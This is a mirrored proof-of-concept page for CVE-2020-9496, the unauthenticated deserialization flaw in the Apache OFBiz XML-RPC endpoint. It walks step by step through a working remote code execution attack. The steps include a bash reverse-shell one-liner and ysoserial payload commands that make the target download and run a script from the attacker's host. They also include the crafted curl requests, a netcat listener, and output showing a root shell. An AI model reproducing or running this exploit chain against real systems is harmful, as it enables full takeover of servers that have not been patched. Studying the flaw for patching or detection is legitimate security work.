Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2020-9496 PoC — Apache OFBiz 代码问题漏洞

Source
https://github.com/cyber-niz/CVE-2020-9496
Associated Vulnerability
Title:Apache OFBiz 代码问题漏洞 (CVE-2020-9496)
Description:XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
Description
CVE-2020-9496 manual exploit
Readme
# CVE-2020-9496 - RCE
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.

This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

# Affected Version 17.12.01

# Fixed Versions 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

For this POC to work we need to drop a shell script and execute/access that file via curl.

### STEP 1: Create A Shell File With Bash One-liner With Your IP Address & Port Address.

```
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1
```
### STEP 2: Now We Need To Make This File Available via HTTP Service

```
$ sudo python3 -m http.server 80
```

### STEP 3: Generate Payload via ysoserial  - Change IP

```
$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"
```

### STEP 4: Copy The Output of Your Payload - Very Long String

```
rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
```

### STEP 5: Use the below curl command to execute our payload. Paste payload after extensions”>
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### Curl Command Without Payload For Your Reference

```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```

### Make Sure Whether You Got A Hit On HTTP Server After Curl Command Execution

```
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -
```
As you can see we got a hit on our HTTP server. File has been downloaded to /tmp directory named as shell.sh. Now to execute that file create payload again. But before you do that start a netcat listener.

### STEP 6: Start NetCat Listener

```
$ nc -lvnp 1337
listening on [any] 1337 ...
```

### STEP 7: Create Payload To Execute Previously Downloaded Shell Script

```
$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 8: Copy & Paste The Output Inside Curl Command & Execute It

```
curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### STEP 10: Check NetCat Listener For Reverse Connection

```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →